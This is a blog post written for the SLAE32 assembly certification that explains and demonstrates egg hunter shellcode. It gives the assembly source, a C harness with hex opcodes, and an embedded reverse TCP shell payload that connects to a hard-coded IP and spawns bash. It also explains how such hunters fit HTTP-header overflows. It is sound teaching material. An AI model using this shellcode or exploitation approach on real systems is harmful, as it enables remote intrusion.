Skip to main content

SLAE32 - Assignment 3

This is part three (3) in a seven (7) part series for the SecurityTube Linux Assembly Expert 32-bit certification challenge. You can find part one (1) here: Part 1 - Assignment 1.

You can read part two (2) here: Part 2 - Assignment 2.

In assignment three (3), we were given the following instructions:

  1. Study about the Egg Hunter shellcode
  2. Create a working demo of the Egg Hunter
  3. Should be configurable for different payloads

The full code for this assignment can be found here:
https://github.com/blu3gl0w13/SLAE32/tree/master/assignment-3.

Supplemental scripts can be found here:
https://github.com/blu3gl0w13/SLAE32/tree/master/scripts

I must say, I really enjoyed this assignment. I had some experience with Egg Hunters during the Pentesting with Kali (PWK) course offered by Offensive Security. With my new found assembly skills though, this offered a chance to really understand some of the assembly instructions being used. For this assignment I relied heavily on the following articles:

http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

https://www.exploit-db.com/docs/18482.pdf

http://www.fuzzysecurity.com/tutorials/expDev/4.html


I would encourage you to read Skape's paper. It's pretty much the go to for Egg Hunter shellcode. I actually used one of his Egg Hunters with a different system call to complete this assignment. Let's break down this script. Similar to Skape's paper (section 3.2.1 - ACCESS system call), we find a system call that returns the error we're looking for 0xf2 so that we can safely dereference any pointers/areas of memory and do our best to avoid crashing the system. I found USELIB only requires one parameter and it returns the error value we're looking for. Let's take a look at the man page.




I modified the code from Skape's white paper so it would run on Kali using nasm. I needed to modify the JZ, and JNZ instructions so that they jumped to the correct label incrementer if a match wasn't found. The original code jumped back to the beginning + 0x7 upon unsuccessful match. We can see the original code plus modifications below.

global _start

section .text


_start:

 ; This is our egghuter
 ; it needs to search for 
 ; 2 consecutive instances
 ; of our 'hack' string
 ; and then jump into, and execute
 ; our reverse TCP shellcode
 ;
 ; we'll try this out with the uselib syscall 86
 ; and hope we can find and execute our shell
 ; in the data section

     xor edx, edx              ; initialize the registers

page_alignment:
     or dx, 0xfff              ; helps set up for page size (0xfff = 4095)

incrementer:
     inc edx                   ; increase edx by 1

hunter:
     lea ebx, [edx + 4]        ; put the address of edx plus 4 bytes 
                               ; into ebx for the syscall
     xor eax, eax              ; clear out eax
     mov al, 0x56              ; #define __NR_uselib       86 (0x56) 
     int 0x80                  ; call it
     cmp al, 0xf2              ; compare the return value in eax
     jz page_alignment         ; short jump to next page if ZF set
     mov eax, 0x6861636b       ; copy our comparison string into eax
     mov edi, edx              ; mov our value in edx into edi
     scasd                     ; compare eax with dword at edi 
                               ; (in other words, check to see if we 
                               ; have 2 consecutive strings)
     jnz incrementer           ; short jump if ZF not set (no match)
     scasd                     ; make the eax comparison again (match, compare again)
     jnz incrementer           ; short jump if ZF not set (no match)
     jmp edi                   ; we found a match! pwnage!!!

The next part of this assignment was rather funny because I was having trouble thinking through how I would put my shellcode with egg to be hunted. Then I looked in shellcode.c provided in some of the example scripts in order for us to test our shellcode throughout the class. Then it dawned on me. Duh, I should be able to just create another unsigned character array. The array will get put into memory, and voila, we'll execute our egg hunter to search memory for our egg x 2 and actual shellcode. Perfect! So, we define our EGG as a preprocessor macro to make it easy to configure our EGG value as necessary. All we need to do then is to define a pointer to our function (*ret)() and assign our EGGHUNTER to it, and then finally call the function.


#include <stdio.h>
#include <string.h>

#define EGG "\x68\x61\x63\x6b"

unsigned char egghunter[] = \
"\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04"
"\x31\xc0\xb0\x56\xcd\x80\x3c\xf2\x74\xed\xb8"
EGG
"\x89\xd7\xaf\x75\xe8\xaf\x75\xe5\xff\xe7";

unsigned char shellcode[] = EGG EGG \
"\x31\xc0\x31\xdb\x6a\x06\x6a\x01\x6a\x02\xb0"
"\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc7\xeb\x5b"
"\x5e\x31\xc0\x31\xc9\xff\x36\x66\xff\x76\x04"
"\xb0\x02\x66\x50\x89\xe0\x6a\x10\x50\x57\x31"
"\xc0\xb0\x66\x31\xdb\xb3\x03\x89\xe1\xcd\x80"
"\x31\xdb\x31\xc9\x89\xfb\xb0\x3f\xcd\x80\x41"
"\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x31\xc0"
"\x50\x68\x62\x61\x73\x68\x68\x2f\x2f\x2f\x2f"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x66\x68\x2d"
"\x69\x89\xe6\x50\x56\x53\x89\xe1\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xa0\xff\xff\xff\xc0\xa8\xfa"
"\x81\x11\x5c"; 

int main()
{

 printf("Shellcode Length:  %d\n", strlen(egghunter));

 int (*ret)() = (int(*)())egghunter;

 ret();

}

If everything works, we should get get our EXECVE /bin/bash -i to work. One important note, the egghunter is only 36 bytes, not the entire shellcode.




Ok, so practically speaking, where can an egg hunter like this come in handy? Well, let's consider a few important details about egg hunter shellcode. One, you have limited space in your initially compromised buffer. Two, you need to have an alternate area of memory to inject your EGG x 2 along with your shellcode and that memory space must have enough room for two (2) eggs and the shellcode. One situation where I've successfully used an egg hunter before is within an Apache vulnerability. I'll let you search for it yourself but think about why a web server would make a great candidate. Say you have an overflow situation in an HTTP header but the size of the buffer isn't big enough for your shellcode, and attempts to extend the buffer space fails miserably. If we were to use an egg hunter in such an exploit, where could we put our eggs and shellcode? If we examine how a web server handles, say, POST requests and accompanying data, we would learn this is a great place for our shellcode and eggs.

Next: Part 4 - Assignment 4

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-744
Labels:

Comments

Post a Comment

Please leave a comment. Keep it on topic and appropriate for all audiences.

Popular posts from this blog

SLAE/SLAE64 Course Review

After recently finishing both the SLAE (http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/index.html) and SLAE64 (http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html) courses available through SecurityTube Training, and earning both certifications, I thought I would write a review of the training itself. Personally, I chose these course as a way to learn Assembly in preparation for the Crack The Perimeter (CTP) course and OSCE certification. After taking the Pentesting With Kali (PWK) class and earning the OSCP, I knew I needed to fill some gaps in my knowledge, and specifically with C and Assembly programming. Seeing that there aren't many training offerings that aim to teach Assembly specific to penetration testing and shellcoding, I gave SLAE a try.

  If you don't care about the certification itself, you can obtain all of SecurityTube's videos for a small monthly fee through Pentes…
2 comments
Read more

SLAE32 - Assignment 1

In preparation for the next Offensive Security certification class and challenge (CTP and OSCE), I decided to invest some time and energy into the Security Tube Linux Assembly Expert 32-bit class. That way I can have a solid foundation in understanding the finer workings of Assembly. Especially since my focus for my second Bachelor's degree was more along the lines of system administration and back-end web development instead of the programming focus of Computer Science. Still, I never stop with my learning and barely slow down at times.

This was the first assignment out of seven (7) and the requirements for assignment one (1) were as follows:

Create a Shell_Bind_TCP shellcodeBinds to a portExecs shell upon connectionThe PORT number should be easily configurable
This is a pretty standard request but I must admit the process was only somewhat familiar. I knew I could write the code pretty easily once I understood the process. For this, I had to fall back on my love for Python to un…
Post a Comment
Read more

Binary Analysis Cookbook: The Process and Working with Packt

Hello to you, yes you, reading this blog. Thank you for stopping by and I apologize for going silent for a while. Life has been busy in one way or another and unfortunately, this was one area that suffered. Thank you for understanding and please read on.

At the end of 2018, I received a LinkedIn message from someone at Packt Publishing inquiring whether I would have any interest in writing a book for them. Naturally, and partly due to my lack of knowledge or experience with the process, I was a bit skeptical. I replied to the e-mail and said I would be interested in finding out more, all while nearly simultaneously I reached out to Packt via their web contact form to verify this person was who she said she was. I mean after all, this kind of thing doesn't normally happen to me and I have done what I can to regain some of my public anonymity following a career in broadcast television.
Post a Comment
Read more